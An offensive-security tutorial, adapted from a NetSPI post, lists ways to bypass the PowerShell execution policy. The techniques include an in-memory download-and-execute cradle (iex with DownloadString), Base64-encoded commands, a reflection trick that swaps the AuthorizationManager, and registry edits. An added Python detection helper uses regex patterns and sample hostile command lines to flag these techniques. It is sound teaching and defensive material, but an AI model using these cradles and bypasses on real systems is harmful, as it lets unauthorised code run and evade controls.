Bypass the PowerShell Execution Policy
💻 15 Ways to Bypass the PowerShell Execution Policy
🔎 What is the PowerShell Execution Policy?
PowerShell's execution policy determines what type of PowerShell scripts (if any) can run. By default, it is set to Restricted, which blocks all scripts. It is meant to prevent accidental execution, not to act as a true security control — which is why it is easy to bypass, and the methods below allow you to do so without needing admin rights.
💡 Why Bypass It?
- PowerShell is native to Windows
- Can interact with the Windows API
- Can run in memory (no disk writes)
- Often trusted by whitelisting tools
- Used in many open-source pentest frameworks
🔍 View Current Execution Policy
```powershell
Get-ExecutionPolicy
Get-ExecutionPolicy -List | Format-Table -AutoSize
```
🧪 Test Script Example
```powershell
Write-Host "My voice is my passport, verify me."
```
---
🚪 15 Ways to Bypass Execution Policy
- **Paste directly in the interactive console.** Run the script directly in the PowerShell console. Policies don't apply to manually typed commands, so no config changes or file writes are needed.
- **Echo and pipe to PowerShell.** Executes via stdin.
  ```powershell
  echo Write-Host "My voice is my passport" | powershell -noprofile -
  ```
- **Pipe a script file via Type/Get-Content.** Reads the file line by line as input.
  ```powershell
  Get-Content .\runme.ps1 | powershell -noprofile -
  type .\runme.ps1 | powershell -noprofile -
  ```
- **Download and execute in memory (Invoke-Expression).** No file is written to disk.
  ```powershell
  powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL')"
  ```
- **Use the -Command switch.** Executes inline commands.
  ```powershell
  powershell -command "Write-Host 'Hello'"
  ```
- **Use the -EncodedCommand switch.** A Base64-encoded (UTF-16LE) string is passed directly to PowerShell.
  ```powershell
  $cmd = "Write-Host 'Hello'"
  $bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd)
  [Convert]::ToBase64String($bytes)
  ```
  Then run with:
  ```powershell
  powershell -EncodedCommand <base64>
  ```
- **Invoke-Command.**
  ```powershell
  Invoke-Command -ScriptBlock {Write-Host "Hello"}
  ```
  Can also pull the policy from a remote host:
  ```powershell
  Invoke-Command -ComputerName server -ScriptBlock {Get-ExecutionPolicy} | Set-ExecutionPolicy -Force
  ```
- **Invoke-Expression (iex).**
  ```powershell
  Get-Content .\runme.ps1 | Invoke-Expression
  gc .\runme.ps1 | iex
  ```
- **Use -ExecutionPolicy Bypass.**
  ```powershell
  powershell -ExecutionPolicy Bypass -File .\runme.ps1
  ```
- **Use -ExecutionPolicy Unrestricted.**
  ```powershell
  powershell -ExecutionPolicy Unrestricted -File .\runme.ps1
  ```
- **Use -ExecutionPolicy RemoteSigned.**
  ```powershell
  powershell -ExecutionPolicy RemoteSigned -File .\runme.ps1
  ```
- **Swap the AuthorizationManager (temporary).** Replaces the session's authorization manager via reflection; the change lasts only for the current session.
  ```powershell
  function Disable-ExecutionPolicy {
      ($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue($executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (New-Object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))
  }
  Disable-ExecutionPolicy
  ```
- **Set the execution policy for the Process scope only.** Affects only the current session.
  ```powershell
  Set-ExecutionPolicy Bypass -Scope Process
  ```
- **Use PowerShell ISE.** Sometimes bypasses the policy.
  ```powershell
  powershell_ise.exe script.ps1
  ```
- **Set the policy for the current user.**
  ```powershell
  Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted
  ```
- **Rename the script to .txt.** Read it and run it manually; avoids .ps1 enforcement.
- **Edit the registry for the current user.** Modify `HKEY_CURRENT_USER\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell` and add or modify the string value `ExecutionPolicy` = `Unrestricted`.
- **WMI.** Runs scripts via WMI.
- **Scheduled task.** Create a task to run your script.
- **PowerShell remoting.** Executes on remote systems; the local policy may not apply.
- **Inject via DLL (advanced).** Loads the PowerShell engine directly in memory.
- **Invoke from MSHTA or wscript.** Uses alternate script hosts to trigger PowerShell.
- **Use trusted software to execute.** Hijack or abuse applications that run PowerShell under the hood.
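For the defensive side of the list above, the following triage helper is an added example (not code from the original post or from NetSPI). It assumes process command lines have already been pulled out of a log source such as Windows Security event 4688 or Sysmon event 1; the `INDICATORS` names, the `SAMPLE_LINES` dictionary and every command line in it are constructed for this example. It flags the switches and cmdlets the page describes (`-ExecutionPolicy Bypass/Unrestricted/RemoteSigned`, `-EncodedCommand`, download-and-`iex` cradles, stdin execution, `Set-ExecutionPolicy`, the HKCU policy key, the AuthorizationManager swap) and decodes an `-EncodedCommand` payload (UTF-16LE, as the page's `[System.Text.Encoding]::Unicode` encoding produces) so the analyst can see what it actually runs:

```python
"""Triage helper: flag execution-policy bypass indicators in process command lines.

Added example, not part of the original post. Input is assumed to be command
lines already extracted from telemetry (e.g. event 4688 / Sysmon event 1).
"""
import base64
import re
from typing import Dict, Optional

# Patterns for the techniques listed on this page. powershell.exe accepts
# unambiguous prefixes of its parameter names, so common short forms are
# included. The (?<!\w) guard avoids matching the hyphen inside cmdlet names
# such as Set-ExecutionPolicy, which has its own indicator below.
INDICATORS = {
    "execution_policy_override": re.compile(
        r"(?<!\w)-(?:ex|exe|exec|ep|executionpolicy)\s+(?:bypass|unrestricted|remotesigned)\b", re.I),
    "encoded_command": re.compile(
        r"(?<!\w)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I),
    "download_cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    # A lone trailing "-" tells powershell.exe to read the script from stdin.
    "stdin_script": re.compile(r"powershell(?:\.exe)?(?:\s+-\w+)*\s+-\s*$", re.I),
    "set_execution_policy": re.compile(r"set-executionpolicy", re.I),
    "policy_registry_key": re.compile(r"shellids\\microsoft\.powershell", re.I),
    "authorization_manager_swap": re.compile(r"_authorizationManager", re.I),
}


def encode_command(command: str) -> str:
    """UTF-16LE + Base64, the form -EncodedCommand expects (used only to build a sample)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> Optional[str]:
    """Decode an -EncodedCommand payload for triage; None if it is not a valid payload."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(cmdline: str) -> dict:
    """Return the indicator names that fire on a command line, plus any decoded payload."""
    result = {
        "indicators": [name for name, rx in INDICATORS.items() if rx.search(cmdline)],
        "decoded": None,
    }
    match = INDICATORS["encoded_command"].search(cmdline)
    if match:
        decoded = decode_encoded_command(match.group(1))
        result["decoded"] = decoded
        # The decoded payload may itself contain a cradle or iex: scan it too.
        if decoded:
            result["indicators"].extend(
                f"decoded:{name}" for name, rx in INDICATORS.items()
                if name != "encoded_command" and rx.search(decoded))
    return result


# Constructed sample command lines (not real telemetry), keyed by a line id.
SAMPLE_LINES = {
    "benign": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
    "bypass_flag": r"powershell -ExecutionPolicy Bypass -File .\runme.ps1",
    "cradle": "powershell -nop -c \"iex(New-Object Net.WebClient).DownloadString('https://example.invalid/x')\"",
    "encoded": "powershell -EncodedCommand " + encode_command("Write-Host 'Hello'"),
    "stdin": "powershell -noprofile -",
    "scope_process": 'powershell -c "Set-ExecutionPolicy Bypass -Scope Process"',
}


def triage(lines: Dict[str, str]) -> Dict[str, dict]:
    """Analyze every command line; lines with no indicators are returned with an empty list."""
    return {line_id: analyze_command_line(cmdline) for line_id, cmdline in lines.items()}


if __name__ == "__main__":
    for line_id, res in triage(SAMPLE_LINES).items():
        print(f"{line_id:14} {res['indicators']} decoded={res['decoded']!r}")
```

The indicator list is deliberately broad: `-ExecutionPolicy Bypass` is also used by legitimate automation, so these hits are triage leads to be read together with the parent process and user, not verdicts on their own. The decode step matters because an encoded command hides both the cradle and the policy switch from simple string matching.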
---
✅ Wrap Up
PowerShell's execution policy is a soft restriction — not a security boundary. Microsoft even provides native ways to bypass it. Note: these methods are for legitimate use only — such as automation, testing, red teaming, and administration — and only where authorized.
Adapted from NetSPI — original blog post